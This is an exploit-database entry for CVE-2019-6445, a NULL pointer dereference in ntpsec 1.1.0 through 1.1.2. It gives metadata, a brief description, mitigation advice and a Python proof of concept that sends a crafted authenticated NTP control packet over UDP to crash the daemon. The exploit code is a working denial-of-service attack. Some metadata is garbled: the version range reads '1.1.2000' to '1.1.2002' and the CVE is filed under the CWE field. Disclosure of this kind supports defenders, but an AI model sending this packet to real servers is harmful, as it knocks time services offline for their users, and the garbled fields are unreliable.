ntpsec 1.1.2 authenticated NULL pointer exception Proof of concept

vendor:

ntpsec

by:

Magnus Klaaborg Stubman

6.5

CVSS

MEDIUM

authenticated NULL pointer exception

NULL Pointer Dereference

CWE

Product Name: ntpsec

Affected Version From: 1.1.2000

Affected Version To: 1.1.2002

Patch Exists: NO

Related CWE: CVE-2019-6445

CPE: a:ntpsec_project:ntpsec:1.1.0cpe:/a:ntpsec_project:ntpsec:1.1.1cpe:/a:ntpsec_project:ntpsec:1.1.2

Metasploit: https://www.rapid7.com/db/vulnerabilities/suse-cve-2019-6445/

Other Scripts:

Platforms Tested:

2019

ntpsec 1.1.2 authenticated NULL pointer exception Proof of concept

This exploit allows an attacker to trigger a NULL pointer exception in ntpsec version 1.1.2, causing a denial-of-service condition. The vulnerability is authenticated, meaning that the attacker must provide valid credentials to exploit it. The exploit sends a specially crafted packet to the target server, triggering the NULL pointer exception.

Mitigation:

Update to a version of ntpsec that is not affected by this vulnerability. Alternatively, disable the vulnerable functionality if it is not needed.

Source

Exploit-DB raw data:

#!/usr/bin/env python
# Exploit Title: ntpsec 1.1.2 authenticated NULL pointer exception Proof of concept
# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman)
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
# Website: https://dumpco.re/bugs/ntpsec-authed-npe 
# Vendor Homepage: https://ntpsec.org/ 
# Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz 
# Affected versions: ntpsec 1.1.0, 1.1.1, 1.1.2
# CVE: CVE-2019-6445
# Note: this PoC uses Keyid 1 with password 'gurka'

import sys
import socket

buf = ("\x16\x03\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x6c\x65\x61\x70" +
       "\x00\x00\x00\x01\x5c\xb7\x3c\xdc\x9f\x5c\x1e\x6a\xc5\x9b\xdf\xf5" +
       "\x56\xc8\x07\xd4")

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(buf, ('127.0.0.1', 123))